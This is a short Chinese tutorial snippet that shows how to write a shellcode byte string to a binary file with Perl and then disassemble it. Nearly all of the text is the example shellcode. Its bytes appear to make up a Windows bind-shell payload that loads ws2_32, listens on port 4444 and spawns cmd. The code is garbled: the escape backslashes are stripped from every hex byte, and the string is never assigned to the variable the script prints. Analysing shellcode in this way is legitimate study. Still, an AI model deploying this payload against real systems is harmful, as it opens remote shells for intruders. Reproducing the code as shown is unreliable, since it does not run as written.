經常可以看到一些精彩的shellcode,但又不知道它怎麼來得,一堆16進制數字看的眼暈。這裏有個方法:
首先用perl將這段shellcode寫入一個二進制文件,然後利用反彙編工具進行反彙編,就可以看到shellcode對應彙編源碼咯。呵呵
例如:
#!/usr/bin/perl
"xfcx6axebx4dxe8xf9xffxffxffx60x8bx6c".
"x24x24x8bx45x3cx8bx7cx05x78x01xefx8b".
"x4fx18x8bx5fx20x01xebx49x8bx34x8bx01".
"xeex31xc0x99xacx84xc0x74x07xc1xcax0d".
"x01xc2xebxf4x3bx54x24x28x75xe5x8bx5f".
"x24x01xebx66x8bx0cx4bx8bx5fx1cx01xeb".
"x03x2cx8bx89x6cx24x1cx61xc3x31xdbx64".
"x8bx43x30x8bx40x0cx8bx70x1cxadx8bx40".
"x08x5ex68x8ex4ex0execx50xffxd6x66x53".
"x66x68x33x32x68x77x73x32x5fx54xffxd0".
"x68xcbxedxfcx3bx50xffxd6x5fx89xe5x66".
"x81xedx08x02x55x6ax02xffxd0x68xd9x09".
"xf5xadx57xffxd6x53x53x53x53x53x43x53".
"x43x53xffxd0x66x68x11x5cx66x53x89xe1".
"x95x68xa4x1ax70xc7x57xffxd6x6ax10x51".
"x55xffxd0x68xa4xadx2exe9x57xffxd6x53".
"x55xffxd0x68xe5x49x86x49x57xffxd6x50".
"x54x54x55xffxd0x93x68xe7x79xc6x79x57".
"xffxd6x55xffxd0x66x6ax64x66x68x63x6d".
"x89xe5x6ax50x59x29xccx89xe7x6ax44x89".
"xe2x31xc0xf3xaaxfex42x2dxfex42x2cx93".
"x8dx7ax38xabxabxabx68x72xfexb3x16xff".
"x75x44xffxd6x5bx57x52x51x51x51x6ax01".
"x51x51x55x51xffxd0x68xadxd9x05xcex53".
"xffxd6x6axffxffx37xffxd0x8bx57xfcx83".
"xc4x64xffxd6x52xffxd0x68x7exd8xe2x73".
"x53xffxd6xffxd0";
open(FILE,">shellcode.bin");
print FILE "$shellcode";
close(FILE);